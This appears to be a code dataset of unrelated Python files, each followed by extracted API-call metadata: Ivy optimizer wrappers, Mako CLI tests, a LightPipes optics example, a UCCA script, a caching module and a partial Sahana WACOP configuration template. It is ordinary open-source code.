stop_gradients=stop_gradients,
key_chains=key_chains,
to_apply=to_apply,
prune_unapplied=prune_unapplied,
map_sequences=map_sequences,
)
def lars_update(
self,
dcdw,
lr,
decay_lambda=0,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
):
return self.static_lars_update(
self,
dcdw,
lr,
decay_lambda,
inplace,
stop_gradients,
key_chains,
to_apply,
prune_unapplied,
map_sequences,
)
@staticmethod
def static_adam_update(
w,
dcdw,
lr,
mw_tm1,
vw_tm1,
step,
beta1=0.9,
beta2=0.999,
epsilon=1e-7,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
) -> ivy.Container:
return ContainerBase.multi_map_in_static_method(
"adam_update",
w,
dcdw,
lr,
mw_tm1=mw_tm1,
vw_tm1=vw_tm1,
step=step,
beta1=beta1,
beta2=beta2,
epsilon=epsilon,
inplace=inplace,
stop_gradients=stop_gradients,
key_chains=key_chains,
to_apply=to_apply,
prune_unapplied=prune_unapplied,
map_sequences=map_sequences,
)
def adam_update(
self,
dcdw,
lr,
mw_tm1,
vw_tm1,
step,
beta1=0.9,
beta2=0.999,
epsilon=1e-7,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
):
return self.static_adam_update(
self,
dcdw,
lr,
mw_tm1,
vw_tm1,
step,
beta1,
beta2,
epsilon,
inplace,
stop_gradients,
key_chains,
to_apply,
prune_unapplied,
map_sequences,
)
@staticmethod
def static_lamb_update(
w,
dcdw,
lr,
mw_tm1,
vw_tm1,
step,
beta1=0.9,
beta2=0.999,
epsilon=1e-7,
max_trust_ratio=10,
decay_lambda=0,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
) -> ivy.Container:
return ContainerBase.multi_map_in_static_method(
"lamb_update",
w,
dcdw,
lr,
mw_tm1=mw_tm1,
vw_tm1=vw_tm1,
step=step,
beta1=beta1,
beta2=beta2,
epsilon=epsilon,
max_trust_ratio=max_trust_ratio,
decay_lambda=0,
inplace=inplace,
stop_gradients=stop_gradients,
key_chains=key_chains,
to_apply=to_apply,
prune_unapplied=prune_unapplied,
map_sequences=map_sequences,
)
def lamb_update(
self,
dcdw,
lr,
mw_tm1,
vw_tm1,
step,
beta1=0.9,
beta2=0.999,
epsilon=1e-7,
max_trust_ratio=10,
decay_lambda=0,
inplace=None,
stop_gradients=True,
key_chains: Optional[Union[List[str], Dict[str, str]]] = None,
to_apply: bool = True,
prune_unapplied: bool = False,
map_sequences: bool = False,
):
return self.static_lamb_update(
self,
dcdw,
lr,
mw_tm1,
vw_tm1,
step,
beta1,
beta2,
epsilon,
max_trust_ratio,
decay_lambda,
inplace,
stop_gradients,
key_chains,
to_apply,
prune_unapplied,
map_sequences,
)
| [
"ivy.container.base.ContainerBase.multi_map_in_static_method"
] | [((562, 810), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""optimizer_update"""', 'w', 'effective_grad', 'lr'], {'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('optimizer_update', w,\n effective_grad, lr, inplace=inplace, stop_gradients=stop_gradients,\n key_chains=key_chains, to_apply=to_apply, prune_unapplied=\n prune_unapplied, map_sequences=map_sequences)\n", (602, 810), False, 'from ivy.container.base import ContainerBase\n'), ((1907, 2152), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""gradient_descent_update"""', 'w', 'dcdw', 'lr'], {'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('gradient_descent_update', w, dcdw,\n lr, inplace=inplace, stop_gradients=stop_gradients, key_chains=\n key_chains, to_apply=to_apply, prune_unapplied=prune_unapplied,\n map_sequences=map_sequences)\n", (1947, 2152), False, 'from ivy.container.base import ContainerBase\n'), ((3222, 3482), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""lars_update"""', 'w', 'dcdw', 'lr'], {'decay_lambda': 'decay_lambda', 'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('lars_update', w, dcdw, lr,\n decay_lambda=decay_lambda, inplace=inplace, stop_gradients=\n stop_gradients, key_chains=key_chains, to_apply=to_apply,\n prune_unapplied=prune_unapplied, map_sequences=map_sequences)\n", (3262, 3482), False, 'from ivy.container.base import ContainerBase\n'), ((4674, 4997), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""adam_update"""', 'w', 'dcdw', 'lr'], {'mw_tm1': 'mw_tm1', 'vw_tm1': 'vw_tm1', 'step': 'step', 'beta1': 'beta1', 'beta2': 'beta2', 'epsilon': 'epsilon', 'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('adam_update', w, dcdw, lr, mw_tm1\n =mw_tm1, vw_tm1=vw_tm1, step=step, beta1=beta1, beta2=beta2, epsilon=\n epsilon, inplace=inplace, stop_gradients=stop_gradients, key_chains=\n key_chains, to_apply=to_apply, prune_unapplied=prune_unapplied,\n map_sequences=map_sequences)\n", (4714, 4997), False, 'from ivy.container.base import ContainerBase\n'), ((6470, 6843), 'ivy.container.base.ContainerBase.multi_map_in_static_method', 'ContainerBase.multi_map_in_static_method', (['"""lamb_update"""', 'w', 'dcdw', 'lr'], {'mw_tm1': 'mw_tm1', 'vw_tm1': 'vw_tm1', 'step': 'step', 'beta1': 'beta1', 'beta2': 'beta2', 'epsilon': 'epsilon', 'max_trust_ratio': 'max_trust_ratio', 'decay_lambda': '(0)', 'inplace': 'inplace', 'stop_gradients': 'stop_gradients', 'key_chains': 'key_chains', 'to_apply': 'to_apply', 'prune_unapplied': 'prune_unapplied', 'map_sequences': 'map_sequences'}), "('lamb_update', w, dcdw, lr, mw_tm1\n =mw_tm1, vw_tm1=vw_tm1, step=step, beta1=beta1, beta2=beta2, epsilon=\n epsilon, max_trust_ratio=max_trust_ratio, decay_lambda=0, inplace=\n inplace, stop_gradients=stop_gradients, key_chains=key_chains, to_apply\n =to_apply, prune_unapplied=prune_unapplied, map_sequences=map_sequences)\n", (6510, 6843), False, 'from ivy.container.base import ContainerBase\n')] |
from __future__ import with_statement
from contextlib import contextmanager
from test import TemplateTest, eq_, raises, template_base, mock
import os
from mako.cmd import cmdline
class CmdTest(TemplateTest):
@contextmanager
def _capture_output_fixture(self, stream="stdout"):
with mock.patch("sys.%s" % stream) as stdout:
yield stdout
def test_stdin_success(self):
with self._capture_output_fixture() as stdout:
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="hello world ${x}"))):
cmdline(["--var", "x=5", "-"])
eq_(stdout.write.mock_calls[0][1][0], "hello world 5")
def test_stdin_syntax_err(self):
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="${x"))):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5", "-"])
assert "SyntaxException: Expected" in \
stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_stdin_rt_err(self):
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="${q}"))):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5", "-"])
assert "NameError: Undefined" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_success(self):
with self._capture_output_fixture() as stdout:
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_good.mako")])
eq_(stdout.write.mock_calls[0][1][0], "hello world 5")
def test_file_syntax_err(self):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_syntax.mako")])
assert "SyntaxException: Expected" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_rt_err(self):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_runtime.mako")])
assert "NameError: Undefined" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_notfound(self):
with raises(SystemExit, "error: can't find fake.lalala"):
cmdline(["--var", "x=5", "fake.lalala"])
| [
"mako.cmd.cmdline",
"test.raises",
"os.path.join",
"test.mock.patch",
"test.eq_",
"test.mock.Mock"
] | [((641, 695), 'test.eq_', 'eq_', (['stdout.write.mock_calls[0][1][0]', '"""hello world 5"""'], {}), "(stdout.write.mock_calls[0][1][0], 'hello world 5')\n", (644, 695), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((1849, 1903), 'test.eq_', 'eq_', (['stdout.write.mock_calls[0][1][0]', '"""hello world 5"""'], {}), "(stdout.write.mock_calls[0][1][0], 'hello world 5')\n", (1852, 1903), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((298, 327), 'test.mock.patch', 'mock.patch', (["('sys.%s' % stream)"], {}), "('sys.%s' % stream)\n", (308, 327), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((2741, 2792), 'test.raises', 'raises', (['SystemExit', '"""error: can\'t find fake.lalala"""'], {}), '(SystemExit, "error: can\'t find fake.lalala")\n', (2747, 2792), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((2806, 2846), 'mako.cmd.cmdline', 'cmdline', (["['--var', 'x=5', 'fake.lalala']"], {}), "(['--var', 'x=5', 'fake.lalala'])\n", (2813, 2846), False, 'from mako.cmd import cmdline\n'), ((601, 631), 'mako.cmd.cmdline', 'cmdline', (["['--var', 'x=5', '-']"], {}), "(['--var', 'x=5', '-'])\n", (608, 631), False, 'from mako.cmd import cmdline\n'), ((2021, 2039), 'test.raises', 'raises', (['SystemExit'], {}), '(SystemExit)\n', (2027, 2039), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((2415, 2433), 'test.raises', 'raises', (['SystemExit'], {}), '(SystemExit)\n', (2421, 2433), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((936, 954), 'test.raises', 'raises', (['SystemExit'], {}), '(SystemExit)\n', (942, 954), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((976, 1006), 'mako.cmd.cmdline', 'cmdline', (["['--var', 'x=5', '-']"], {}), "(['--var', 'x=5', '-'])\n", (983, 1006), False, 'from mako.cmd import cmdline\n'), ((1422, 1440), 'test.raises', 'raises', (['SystemExit'], {}), '(SystemExit)\n', (1428, 1440), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((1462, 1492), 'mako.cmd.cmdline', 'cmdline', (["['--var', 'x=5', '-']"], {}), "(['--var', 'x=5', '-'])\n", (1469, 1492), False, 'from mako.cmd import cmdline\n'), ((1793, 1837), 'os.path.join', 'os.path.join', (['template_base', '"""cmd_good.mako"""'], {}), "(template_base, 'cmd_good.mako')\n", (1805, 1837), False, 'import os\n'), ((815, 844), 'test.mock.Mock', 'mock.Mock', ([], {'return_value': '"""${x"""'}), "(return_value='${x')\n", (824, 844), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((1300, 1330), 'test.mock.Mock', 'mock.Mock', ([], {'return_value': '"""${q}"""'}), "(return_value='${q}')\n", (1309, 1330), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n'), ((2110, 2156), 'os.path.join', 'os.path.join', (['template_base', '"""cmd_syntax.mako"""'], {}), "(template_base, 'cmd_syntax.mako')\n", (2122, 2156), False, 'import os\n'), ((2504, 2551), 'os.path.join', 'os.path.join', (['template_base', '"""cmd_runtime.mako"""'], {}), "(template_base, 'cmd_runtime.mako')\n", (2516, 2551), False, 'import os\n'), ((539, 581), 'test.mock.Mock', 'mock.Mock', ([], {'return_value': '"""hello world ${x}"""'}), "(return_value='hello world ${x}')\n", (548, 581), False, 'from test import TemplateTest, eq_, raises, template_base, mock\n')] |
from LightPipes import *
import matplotlib.pyplot as plt
def TheExample(N):
fig=plt.figure(figsize=(11,9.5))
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(222)
ax3 = fig.add_subplot(223)
ax4 = fig.add_subplot(224)
labda=1000*nm;
size=10*mm;
f1=10*m
f2=1.11111111*m
z=1.0*m
w=5*mm;
F=Begin(size,labda,N);
F=RectAperture(w,w,0,0,0,F);
#1) Using Lens and Fresnel:
F1=Lens(z,0,0,F)
F1=Fresnel(z,F1)
phi1=Phase(F1);phi1=PhaseUnwrap(phi1)
I1=Intensity(0,F1);
x1=[]
for i in range(N):
x1.append((-size/2+i*size/N)/mm)
#2) Using Lens + LensFresnel and Convert:
F2=Lens(f1,0,0,F);
F2=LensFresnel(f2,z,F2);
F2=Convert(F2);
phi2=Phase(F2);phi2=PhaseUnwrap(phi2)
I2=Intensity(0,F2);
x2=[]
newsize=size/10
for i in range(N):
x2.append((-newsize/2+i*newsize/N)/mm)
ax1.plot(x1,phi1[int(N/2)],'k--',label='Lens + Fresnel')
ax1.plot(x2,phi2[int(N/2)],'k',label='LensFresnel + Convert');
ax1.set_xlim(-newsize/2/mm,newsize/2/mm)
ax1.set_ylim(-2,4)
ax1.set_xlabel('x [mm]');
ax1.set_ylabel('phase [rad]');
ax1.set_title('phase, N = %d' %N)
legend = ax1.legend(loc='upper center', shadow=True)
ax2.plot(x1,I1[int(N/2)],'k--',label='Lens+Fresnel')
ax2.plot(x2,I2[int(N/2)], 'k',label='LensFresnel + Convert');
ax2.set_xlim(-newsize/2/mm,newsize/2/mm)
ax2.set_ylim(0,1000)
ax2.set_xlabel('x [mm]');
ax2.set_ylabel('Intensity [a.u.]');
ax2.set_title('intensity, N = %d' %N)
legend = ax2.legend(loc='upper center', shadow=True)
ax3.imshow(I1);ax3.axis('off');ax3.set_title('Intensity, Lens + Fresnel, N = %d' %N)
ax3.set_xlim(int(N/2)-N/20,int(N/2)+N/20)
ax3.set_ylim(int(N/2)-N/20,int(N/2)+N/20)
ax4.imshow(I2);ax4.axis('off');ax4.set_title('Intensity, LensFresnel + Convert, N = %d' %N)
plt.show()
TheExample(100) #100 x 100 grid
TheExample(1000) #1000 x 1000 grid
| [
"matplotlib.pyplot.figure",
"matplotlib.pyplot.show"
] | [((85, 114), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(11, 9.5)'}), '(figsize=(11, 9.5))\n', (95, 114), True, 'import matplotlib.pyplot as plt\n'), ((1906, 1916), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1914, 1916), True, 'import matplotlib.pyplot as plt\n')] |
from argparse import ArgumentParser
from ucca import constructions
from ucca.ioutil import read_files_and_dirs
if __name__ == "__main__":
argparser = ArgumentParser(description="Extract linguistic constructions from UCCA corpus.")
argparser.add_argument("passages", nargs="+", help="the corpus, given as xml/pickle file names")
constructions.add_argument(argparser, False)
argparser.add_argument("-v", "--verbose", action="store_true", help="print tagged text for each passage")
args = argparser.parse_args()
for passage in read_files_and_dirs(args.passages):
if args.verbose:
print("%s:" % passage.ID)
extracted = constructions.extract_edges(passage, constructions=args.constructions, verbose=args.verbose)
if any(extracted.values()):
if not args.verbose:
print("%s:" % passage.ID)
for construction, edges in extracted.items():
if edges:
print(" %s:" % construction.description)
for edge in edges:
print(" %s [%s %s]" % (edge, edge.tag, edge.child))
print()
| [
"ucca.ioutil.read_files_and_dirs",
"ucca.constructions.extract_edges",
"ucca.constructions.add_argument",
"argparse.ArgumentParser"
] | [((162, 247), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Extract linguistic constructions from UCCA corpus."""'}), "(description='Extract linguistic constructions from UCCA corpus.'\n )\n", (176, 247), False, 'from argparse import ArgumentParser\n'), ((350, 394), 'ucca.constructions.add_argument', 'constructions.add_argument', (['argparser', '(False)'], {}), '(argparser, False)\n', (376, 394), False, 'from ucca import constructions\n'), ((561, 595), 'ucca.ioutil.read_files_and_dirs', 'read_files_and_dirs', (['args.passages'], {}), '(args.passages)\n', (580, 595), False, 'from ucca.ioutil import read_files_and_dirs\n'), ((683, 779), 'ucca.constructions.extract_edges', 'constructions.extract_edges', (['passage'], {'constructions': 'args.constructions', 'verbose': 'args.verbose'}), '(passage, constructions=args.constructions,\n verbose=args.verbose)\n', (710, 779), False, 'from ucca import constructions\n')] |
import hashlib
import os
import pickle
import tempfile
import zlib
from threading import Lock
from time import time
from multicache.base import BaseCache
try:
from multicache.redis import RedisCache
except ImportError:
pass
lock = Lock()
class DummyCache(BaseCache):
""" Fake cache class to allow a "no cache"
use without breaking anything """
def __init__(self):
self._dict = {}
def get(self, key):
return None
def put(self, key, value, ex=None, ttl=None):
pass
def invalidate(self, key):
pass
class DictCache(BaseCache):
""" Saves data in a dictionary without any persistent storage """
def __init__(self, **kwargs):
self._dict = {}
self.ttl = kwargs.pop('ttl', 3600)
def get(self, key):
ret = self._dict.get(key, None)
if ret is not None and ret[1] > time():
# cache hit
return ret[0]
elif ret is None:
# cache miss
return None
else:
# stale, delete from cache
self.invalidate(key)
return None
def put(self, key, value, ex=None, ttl=None):
with lock:
if ex is None:
if ttl is not None:
ex = ttl + time()
else:
ex = self.ttl + time()
self._dict[key] = value, ex
def invalidate(self, key):
self._dict.pop(key, None)
def get_all_keys(self):
return self._dict.keys()
def get_all_values(self):
return [val[0] for val in self._dict.values() if val[1] >= time()]
def recheck(self):
invalid = []
for key, val in self._dict.items():
if time() > val[1]:
invalid.append(key)
for key in invalid:
self.invalidate(key)
class FileCache(BaseCache):
""" Saves data to a dictionary and files, always saves to both,
only reads files when data isn't in dictionary"""
def __init__(self, path=None, **kwargs):
self._cache = {}
self.ttl = kwargs.pop('ttl', 3600)
if path:
self.path = path
else:
self.path = '{}/multicache'.format(tempfile.gettempdir())
if not os.path.isdir(self.path):
os.mkdir(self.path, 0o700)
def _getpath(self, key):
h = hashlib.new('md5')
h.update(key.encode('utf-8'))
return os.path.join(self.path, h.hexdigest() + '.cache')
def put(self, key, value, ex=None, ttl=None):
with lock:
with open(self._getpath(key), 'wb') as f:
if ex is None:
if ttl is not None:
ex = ttl + time()
else:
ex = self.ttl + time()
f.write(zlib.compress(pickle.dumps((value, ex), -1)))
self._cache[key] = (value, ex)
def get(self, key):
if key in self._cache:
cached = self._cache[key]
if cached[1] > time():
return cached[0]
try:
with open(self._getpath(key), 'rb') as f:
ret = pickle.loads(zlib.decompress(f.read()))
if ret[1] > time():
# cache hit
return ret[0]
# stale cache, invalidate
self.invalidate(key)
return None
except IOError as ex:
if ex.errno == 2: # file does not exist (yet)
return None
else:
raise
def invalidate(self, key):
with lock:
self._cache.pop(key, None)
try:
os.unlink(self._getpath(key))
except OSError as ex:
if ex.errno == 2: # does not exist
pass
else:
raise
| [
"hashlib.new",
"pickle.dumps",
"threading.Lock",
"os.path.isdir",
"tempfile.gettempdir",
"os.mkdir",
"time.time"
] | [((241, 247), 'threading.Lock', 'Lock', ([], {}), '()\n', (245, 247), False, 'from threading import Lock\n'), ((2364, 2382), 'hashlib.new', 'hashlib.new', (['"""md5"""'], {}), "('md5')\n", (2375, 2382), False, 'import hashlib\n'), ((2257, 2281), 'os.path.isdir', 'os.path.isdir', (['self.path'], {}), '(self.path)\n', (2270, 2281), False, 'import os\n'), ((2295, 2319), 'os.mkdir', 'os.mkdir', (['self.path', '(448)'], {}), '(self.path, 448)\n', (2303, 2319), False, 'import os\n'), ((876, 882), 'time.time', 'time', ([], {}), '()\n', (880, 882), False, 'from time import time\n'), ((1733, 1739), 'time.time', 'time', ([], {}), '()\n', (1737, 1739), False, 'from time import time\n'), ((2219, 2240), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (2238, 2240), False, 'import tempfile\n'), ((3030, 3036), 'time.time', 'time', ([], {}), '()\n', (3034, 3036), False, 'from time import time\n'), ((1621, 1627), 'time.time', 'time', ([], {}), '()\n', (1625, 1627), False, 'from time import time\n'), ((3229, 3235), 'time.time', 'time', ([], {}), '()\n', (3233, 3235), False, 'from time import time\n'), ((1283, 1289), 'time.time', 'time', ([], {}), '()\n', (1287, 1289), False, 'from time import time\n'), ((1348, 1354), 'time.time', 'time', ([], {}), '()\n', (1352, 1354), False, 'from time import time\n'), ((2834, 2863), 'pickle.dumps', 'pickle.dumps', (['(value, ex)', '(-1)'], {}), '((value, ex), -1)\n', (2846, 2863), False, 'import pickle\n'), ((2716, 2722), 'time.time', 'time', ([], {}), '()\n', (2720, 2722), False, 'from time import time\n'), ((2789, 2795), 'time.time', 'time', ([], {}), '()\n', (2793, 2795), False, 'from time import time\n')] |
# -*- coding: utf-8 -*-
from collections import OrderedDict
from gluon import current
from gluon.storage import Storage
def config(settings):
"""
Template for WA-COP + CAD Cloud Integration
"""
T = current.T
# =========================================================================
# System Settings
#
settings.base.system_name = T("Sahana: Washington Common Operating Picture (WA-COP)")
settings.base.system_name_short = T("Sahana")
# Prepop default
settings.base.prepopulate += ("WACOP", "default/users", "WACOP/Demo")
# Theme (folder to use for views/layout.html)
settings.base.theme = "WACOP"
settings.ui.social_buttons = True
# -------------------------------------------------------------------------
# Self-Registration and User Profile
#
# Users can self-register
settings.security.self_registration = False
# Users need to verify their email
settings.auth.registration_requires_verification = True
# Users need to be approved
settings.auth.registration_requires_approval = True
settings.auth.registration_requests_organisation = True
settings.auth.registration_organisation_required = True
# Approval emails get sent to all admins
settings.mail.approver = "ADMIN"
settings.auth.registration_link_user_to = {"staff": T("Staff")}
settings.auth.registration_link_user_to_default = ["staff"]
settings.auth.registration_roles = {"organisation_id": ["USER"],
}
settings.auth.show_utc_offset = False
settings.auth.show_link = False
# -------------------------------------------------------------------------
# Security Policy
#
settings.security.policy = 7 # Apply Controller, Function and Table ACLs
settings.security.map = True
# -------------------------------------------------------------------------
# L10n (Localization) settings
#
settings.L10n.languages = OrderedDict([
("en", "English"),
("es", "Español"),
])
# Default Language
settings.L10n.default_language = "en"
# Default timezone for users
settings.L10n.utc_offset = "-0800"
# Unsortable 'pretty' date format
settings.L10n.date_format = "%b %d %Y"
# Number formats (defaults to ISO 31-0)
# Decimal separator for numbers (defaults to ,)
settings.L10n.decimal_separator = "."
# Thousands separator for numbers (defaults to space)
settings.L10n.thousands_separator = ","
# Default Country Code for telephone numbers
settings.L10n.default_country_code = 1
# Enable this to change the label for 'Mobile Phone'
settings.ui.label_mobile_phone = "Cell Phone"
# Enable this to change the label for 'Postcode'
settings.ui.label_postcode = "ZIP Code"
settings.msg.require_international_phone_numbers = False
# PDF to Letter
settings.base.paper_size = T("Letter")
# Uncomment this to Translate CMS Series Names
# - we want this on when running s3translate but off in normal usage as we use the English names to lookup icons in render_posts
#settings.L10n.translate_cms_series = True
# Uncomment this to Translate Location Names
#settings.L10n.translate_gis_location = True
# Has scalability issues, but should be OK with our number of records
settings.search.dates_auto_range = True
# -------------------------------------------------------------------------
# GIS settings
#
# Restrict the Location Selector to just certain countries
settings.gis.countries = ("US",)
# Levels for the LocationSelector
levels = ("L1", "L2", "L3")
# Uncomment to pass Addresses imported from CSV to a Geocoder to try and automate Lat/Lon
#settings.gis.geocode_imported_addresses = "google"
# Until we add support to S3LocationSelector to set dropdowns from LatLons
settings.gis.check_within_parent_boundaries = False
# GeoNames username
settings.gis.geonames_username = "mcop"
# Uncomment to hide Layer Properties tool
#settings.gis.layer_properties = False
# Uncomment to display the Map Legend as a floating DIV
settings.gis.legend = "float"
# Uncomment to prevent showing LatLon in Location Represents
settings.gis.location_represent_address_only = "icon"
# Resources which can be directly added to the main map
settings.gis.poi_create_resources = None
# -------------------------------------------------------------------------
# Modules
#
settings.modules = OrderedDict([
# Core modules which shouldn't be disabled
("default", Storage(
name_nice = "Home",
restricted = False, # Use ACLs to control access to this module
access = None, # All Users (inc Anonymous) can see this module in the default menu & access the controller
module_type = None # This item is not shown in the menu
)),
("admin", Storage(
name_nice = "Administration",
#description = "Site Administration",
restricted = True,
access = "|1|", # Only Administrators can see this module in the default menu & access the controller
module_type = None # This item is handled separately for the menu
)),
("appadmin", Storage(
name_nice = "Administration",
#description = "Site Administration",
restricted = True,
module_type = None # No Menu
)),
# ("errors", Storage(
# name_nice = "Ticket Viewer",
# #description = "Needed for Breadcrumbs",
# restricted = False,
# module_type = None # No Menu
# )),
("sync", Storage(
name_nice = "Synchronization",
#description = "Synchronization",
restricted = True,
access = "|1|", # Only Administrators can see this module in the default menu & access the controller
module_type = None # This item is handled separately for the menu
)),
#("translate", Storage(
# name_nice = "Translation Functionality",
# #description = "Selective translation of strings based on module.",
# module_type = None,
#)),
("gis", Storage(
name_nice = "Map",
#description = "Situation Awareness & Geospatial Analysis",
restricted = True,
module_type = 1, # 1st item in the menu
)),
("pr", Storage(
name_nice = "Persons",
description = "Central point to record details on People",
restricted = True,
access = "|1|", # Only Administrators can see this module in the default menu (access to controller is possible to all still)
module_type = None
)),
("org", Storage(
name_nice = "Organizations",
#description = 'Lists "who is doing what & where". Allows relief agencies to coordinate their activities',
restricted = True,
module_type = 10
)),
# All modules below here should be possible to disable safely
("hrm", Storage(
name_nice = "Contacts",
#description = "Human Resources Management",
restricted = True,
module_type = None,
)),
("cms", Storage(
name_nice = "Content Management",
restricted = True,
module_type = 10,
)),
("event", Storage(
name_nice = "Events",
restricted = True,
module_type = 2,
)),
("fire", Storage(
name_nice = "Fire",
restricted = True,
module_type = None,
)),
("police", Storage(
name_nice = "Police",
restricted = True,
module_type = None,
)),
("project", Storage(
name_nice = "Tasks",
restricted = True,
module_type = None,
)),
("doc", Storage(
name_nice = "Documents",
#description = "A library of digital resources, such as photos, documents and reports",
restricted = True,
module_type = None,
)),
("stats", Storage(
name_nice = "Statistics",
restricted = True,
module_type = None
)),
])
# -------------------------------------------------------------------------
# CMS Content Management
#
settings.cms.bookmarks = True
settings.cms.richtext = True
settings.cms.show_tags = True
# -------------------------------------------------------------------------
def cms_post_onaccept(form):
"""
Handle Tags in Create / Update forms
"""
post_id = form.vars.id
db = current.db
s3db = current.s3db
ttable = s3db.cms_tag
ltable = s3db.cms_tag_post
# Delete all existing tags for this post
db(ltable.post_id == post_id).delete()
# Add these tags
tags = current.request.post_vars.get("tags")
if not tags:
return
tags = tags.split(",")
tag_ids = db(ttable.name.belongs(tags)).select(ttable.id,
ttable.name).as_dict(key="name")
for tag in tags:
row = tag_ids.get("tag")
if row:
tag_id = row.get("id")
else:
tag_id = ttable.insert(name=tag)
ltable.insert(post_id = post_id,
tag_id = tag_id,
)
# -------------------------------------------------------------------------
def customise_cms_post_resource(r, tablename):
db = current.db
s3db = current.s3db
table = s3db.cms_post
table.priority.readable = table.priority.writable = True
table.series_id.readable = table.series_id.writable = True
table.status_id.readable = table.status_id.writable = True
method = r.method
if method in ("create", "update"):
# Custom Form
from s3 import S3SQLCustomForm, S3SQLInlineComponent
crud_fields = [(T("Type"), "series_id"),
(T("Priority"), "priority"),
(T("Status"), "status_id"),
(T("Title"), "title"),
(T("Text"), "body"),
(T("Location"), "location_id"),
# Tags are added client-side
S3SQLInlineComponent("document",
name = "file",
label = T("Files"),
fields = [("", "file"),
#"comments",
],
),
]
if r.tablename != "event_incident":
if r.tablename == "event_event":
from gluon import IS_EMPTY_OR
from s3 import IS_ONE_OF
itable = s3db.event_incident
query = (itable.event_id == r.id) & \
(itable.closed == False) & \
(itable.deleted == False)
set = db(query)
f = s3db.event_post.incident_id
f.requires = IS_EMPTY_OR(
IS_ONE_OF(set, "event_incident.id",
f.represent,
orderby="event_incident.name",
sort=True))
crud_fields.insert(0, S3SQLInlineComponent("incident_post",
fields = [("", "incident_id")],
label = T("Incident"),
multiple = False,
))
crud_form = S3SQLCustomForm(*crud_fields
)
# Client support for Tags
appname = r.application
s3 = current.response.s3
scripts_append = s3.scripts.append
if s3.debug:
scripts_append("/%s/static/scripts/tag-it.js" % appname)
else:
scripts_append("/%s/static/scripts/tag-it.min.js" % appname)
scripts_append("/%s/static/themes/WACOP/js/update_tags.js" % appname)
if method == "create":
s3.jquery_ready.append('''wacop_update_tags("")''')
elif method == "update":
ttable = s3db.cms_tag
ltable = s3db.cms_tag_post
if r.tablename == "cms_post":
post_id = r.id
else:
post_id = r.component.id
query = (ltable.post_id == post_id) & \
(ltable.tag_id == ttable.id)
tags = db(query).select(ttable.name)
tags = [tag.name for tag in tags]
tags = ",".join(tags)
s3.jquery_ready.append('''wacop_update_tags("%s")''' % tags)
# Processing Tags
default = s3db.get_config(tablename, "onaccept")
if isinstance(default, list):
onaccept = default
onaccept.append(cms_post_onaccept)
else:
onaccept = [default, cms_post_onaccept]
s3db.configure(tablename,
crud_form = crud_form,
onaccept = onaccept,
)
elif method in ("custom", "datalist", "filter"):
# dataList configuration
from templates.WACOP.controllers import cms_post_list_layout
s3 = current.response.s3
s3.dl_no_header = True
s3db.configure(tablename,
list_fields = ["series_id",
"priority",
"status_id",
"date",
"title",
"body",
"created_by",
"tag.name",
"document.file",
"comment.id",
#"comment.body", # Extra fields come in unsorted, so can't match up to records
#"comment.created_by",
#"comment.created_on",
